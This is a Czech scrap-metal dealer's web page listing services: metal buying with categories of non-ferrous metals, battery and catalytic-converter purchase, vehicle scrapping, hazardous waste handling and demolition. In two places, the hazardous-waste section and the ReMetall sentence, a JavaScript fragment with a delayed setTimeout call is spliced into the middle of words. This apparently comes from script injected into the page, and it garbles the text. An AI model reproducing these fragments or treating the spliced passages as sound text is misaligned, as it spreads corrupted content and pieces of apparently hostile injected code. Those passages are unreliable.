Služby v oblasti výkupuPro všechny zákazníky zajišťujeme:

KOVOVÝ ODPAD

V našich provozovnách vykupujeme kovový odpad od fyzických osob i od firem. Výrobním závodům zajistíme kompletní servis výkupu šrotu. Přijímáme všechny běžné druhy železných i neželezných kovů.

Podle stavu, druhu a množství kovového odpadu volíme nejvhodnější způsoby další úpravy. Při tom samozřejmě dodržujeme zásady ochrany životního prostředí.

 

Ceník

Ceny kovů jsou neustále v pohybu, nejaktuálnější cenu vám sdělí obsluha na sběrnách. Na našich provozech cena pravidelně aktualizujeme. Ceny kovů se kromě situace na trhu s kovovým odpadem odvíjí od tloušťky, rozměrů materiálů a chemického složení.

Kovošrot a bezpečnost

Pokud máte zájem o výkup kovošrotu, dbejte na to, aby neobsahoval zdraví škodlivé či výbušné látky, vyzařující nebezpečné záření, předměty s uzavřenými dutinami nebo ostatní nebezpečné látky a materiály. Při manipulaci, zpracování či při úpravě by mohly ohrozit zdraví a bezpečnost lidí, životního prostředí nebo by mohly způsobit jinou škodu.

BAREVNÉ KOVY

Pokud máte barevné kovy, které již nebudete využívat, přivezte je k nám. Rádi je od vás vykoupíme dle našeho aktuálního ceníku. Barevné kovy vykupujeme v našich provozovnách stejně jako železo. Od drobných dodavatelů přijímáme níže uvedené typy odpadu. 

Při našem výkupu šrotu je samozřejmostí

 • Přesné zvážení na digitálních vahách s přesností na 0,1 kg.
 • Výkup za nejaktuálnější ceny dle LME.

VYKUPOVANÉ BAREVNÉ KOVYPřehled vykupovaných barevných kovů na našich sběrnách

Měď
Cu plech nový
Cu mix, opal, pokovená, plech, kus, oxidovaný drát
Cu kabely (bez koncovek), autokabeláž, datové kabely
Cu kabely s menším množtvím AL (např. stínění u datových kabelů)
Mosaz
Mosaz promíchaná do 2%Fe (kus,baterie,pokovená,plechy)
Mosazné třísky bez Fe
Mosazné třísky do 2% Fe
Zinek
Zn plech
Zn kus
Zn kus do 5% Fe
Bronz
Bronz nemagnetická; magnetická
Bronzové třísky bez Fe (nemagnetické)
Bronzové třísky do 2% Fe (nemagnetické)
Hliník
Al – Cu chladiče
Al drát elektrovodný
kovolisty
Al profil
Al kus do 2% Fe
Olovo, autobaterie a cín
Pb kusové, mašle
Pb autozávaží a tiskařské
Sn a Sn slitiny
Autobaterie

NEBEZPEČNÉ ODPADY

Vyhodnocujeme, svážíme, materiálově využíváme a odstraňujeme nebezpečný odpad. Transport odpadu zajišťujeme moderní a bezpečnou technikou odpovídající nejvyšším evropským standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andardům. Služby spojené s odstraňováním nebezpečného odpadu jsou součástí komplexního odpadového hospodářství poskytovaného městům a obcím nebo jednotlivě drobným živnostníkům a komerčním subjektům.

VÝKUP BATERIÍ

Neopomenutelnou činností naší společnosti je sběr a výkup vyřazených autobaterií a zajištění jejich dalšího zpracování.
Doneste ji k nám! Tato pracoviště jsou dle § 14 odst. 1) zákona o odpadech oprávněnou osobou k převzetí všech druhů vyřazených autobaterií. Platná legislativa řadí autobaterie mezi nebezpečné odpady, což podléhá přísným výkupním a shromažďovacím podmínkám. Naše provozy tyto podmínky plně splňují, a tudíž je zajištěno, že vyřazená autobaterie nebude představovat riziko pro životní prostředí.

Vaše autobaterie vykoupíme za atraktivní ceny, které Vám ochotně sdělí kontaktní pracovníci.

Cestou k nám můžete vždy jenom získat.

 • odevzdáním autobaterie k dalšímu zpracování uděláte pozitivní krok k ochraně společného životního prostředí
 • autobaterii vykoupíme včetně jejich náplní (kyselina, gel,…)
 • s autobaterií můžete dovézt i jiný sběr
 • cesta k nám se vždycky vyplatí

Výkup katalyzátorů

Autoopravnám, servisům i soukromým osobám poskytujeme možnost výkupu autokatalyzátorů. Spolupracujeme s koncovým zpracovatelem, německou firmou REMETALL Deutschlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and AG, přes výhradní české zastoupení ReMetall Česká republika s.r.o.

Firma ReMetall AG disponuje nejmodernější tavírnou, vybavenou elektrickou obloukovou pecí, která umožňuje tavit monolity z drahých kovů při 1500 ° C. Při těchto teplotách zkapalňuje keramická nosná látka, což umožňuje nejefektivnější extrakci kovového obsahu.

Díky mnohaletým zkušenostem měření a laboratorních analýz vytvořila firma ReMetall obsáhlý unikátní katalog katalyzátorů na jehož základě každý dodaný katalyzátor přesně identifikujeme a naceníme Vám jej na našich provozovnách dle aktuálních cen!

Již žádné vyřezávání, drcení, mletí a nebo přeprodávání nadbytečným prostředníkům, to vše je spojeno se zbytečnými náklady navíc, díky kterým nedostanete tolik jako u nás!

 

LIKVIDACE AUTOVRAKŮ

Naše společnost se zabývá ekologickou likvidací motorových vozidel všech značek, typů, stáří a kategorií (M1,  N1,…). Naše pracoviště je dle § 14 odst. 1) zákona č. 185/2001 Sb., o odpadech, oprávněnou osobou  k převzetí a zpracování autovraků, tj. odpadu kat. č. 16 01 04* – autovraky.

U nás za likvidaci autovraků neplatíte žádné poplatky, naopak získáte část peněz nazpět !

Likvidace autovraků je prováděna na specializovaném pracovišti, které je vybaveno nejmodernější technikou zaručující ekologicky šetrné nakládání při všech technologických operacích souvisejících s vlastním zpracováním autovraku. Celé pracoviště je zajištěno izolovanou nepropustnou plochou a odlučovačem lehkých kapalin, díky nimž nemůže dojít k úniku žádné z provozních kapalin vozidla do okolí a tudíž k ohrožení či poškození životního prostředí. Převzetí vozidla je v našich provozovnách pro Vás zcela bezplatné. Přijímáme vozidla v jakémkoliv stavu poškození. Měla by však obsahovat veškeré podstatné části vozidla, kovové součástky a díly (karoserie vč. VIN, motor, převodovka, nápravy … ). .

Co k likvidaci vozidla potřebujete ?

 • velký technický průkaz motorového vozidla
 • průkaz totožnosti (občanský průkaz, cestovní pas)
 • plnou moc (pouze pokud nejste majitelem předávaného vozidla)
 • převzetí vozidla a vystavení dokladu o likvidaci

Po převzetí vozidla našim pracovníkem Vám bude vystaven tzv. doklad o ekologické likvidaci, na jehož základě je možno dle zákona č. 56/2001, o podmínkách provozu vozidel na pozemních komunikacích, provést trvalé vyřazení vozidla z registru vozidel.

Automobil by měl být v kompletním stavu. Pouze v níže uvedených případech považujeme automobil za kompletní i přes chybějící části vozidla:

 • chybějící interiér, pneumatiky včetně ráfku, sedadla, plastové externí prvky, provozní tekutiny.

LIKVIDACE STAVEB

Samozřejmostí je naše činnost v oblasti likvidace objektů obsahujících kovové části. Při spolupráci se specializovanou společností zajistíme likvidaci a odvoz stavebních kovových odpadů. Dokážeme zlikvidovat malé objekty či celé průmyslové areály.

Prodej bazarového zboží

V rámci našich aktivit nabízíme možnost odkupu HUTNÍHO MATERIÁLU. Na těchto stránkách bude průběžně aktualizována tato nabídka vč. fotek. Ceny jednotlivých položek jsou uvedeny u popisu, v opačném případě budou stanovovány dle dohody.

Kopletní nabídka bazarového zboží

přejít do sekce bazar

Pro firemní zákazníky dále zajišťujeme:

ANALÝZA A PORADENSTVÍ

Analýza situace na straně zákazníka je prvním krokem k úspěšnému vypracování návrhu odpadového řešení. Následuje po návštěvě v místě provozu zákazníka, při kterém se většinou definují veškeré požadavky ze strany zákazníka společně s možnostmi a doporučeními ze strany Ekopron-Metal, s.r.o.

Na základě dodaných informací o provozu zákazníka jsme schopni vypočítat nejen finanční úsporu při spolupráci s naší firmou, nýbrž i připravit ucelený návrh provozního řešení, který garantujeme po dobou spolupráce.

Uvědomujeme si dynamiku trhu, proto klademe velký důraz na průběžné vyhodnocování spolupráce s našimi zákazníky a neustálé zlepšování poskytovaných služeb v reakci na specifické podmínky.

CENA VÝKUPU

Firma Ekopron-Metal, s.r.o. patří k lídrům na lokálním trhu, a to i díky dlohodobé spolupráci se stabilními koncovými zpracovateli – železárnami a hutěmi v tuzemsku i zahraničí. Díky vhodné distribuci finálního produktu mezi naše odběratele je zaručena cenová i kvalitativní stabilita odbytu pro naše zákazníky.

Ceníky pravidelně aktualizujeme a naši zákazníci tak mají kdykoliv jistotu, že mohou prodávat suroviny za nejlepší tržní ceny.

Tím, že jsme schopni nabídnout našim odběratelům velmi zajímavá množství, patříme mezi VIP obchodní partnery a tuto výhodu jsme poté schopni přenést i do cenových nabídek pro naše zákazníky.

Zkušenost, kterou naši kvalifikovaní pracovníci získali léty praxe na trhu kovů, úspěšně využíváme i při obchodování s průmyslovými kovy (měď, hliník, zinek, atd.), jejichž ceny jsou ještě více ovlivňovány burzovními vlivy na trhu komodit i měn.

LIKVIDACE VELKÝCH STROJŮ

Naše společnost zajišťuje likvidace vyřazených technologických celků (kotelny, výrobní linky…) stejně jako těžkých strojů (zemní stroje, těžká technika…) přímo v terénu.

Pracovníci našeho výjezdového týmu mají bohaté zkušenosti s likvidacemi hal, drážních svršků, průmyslových technologií, důlní i zemědělské techniky.

Pro likvidace strojů v místě používáme různé technologie dělení materiálu podle situace. Nejběžnější a také nejuniverzálnější způsob je použití kyslíkových hořáků, kterými lze rozřezat většinu konstrukcí.

LIKVIDACE STAVEB

Samozřejmostí je naše činnost v oblasti likvidace objektů obsahujících kovové části. Při spolupráci se specializovanou společností zajistíme kompletní servis včetně odvozu odpadů a sutí. Dokážeme zlikvidovat malé objekty či celé průmyslové areály.

Kopletní nabídka pro firemní zákazníky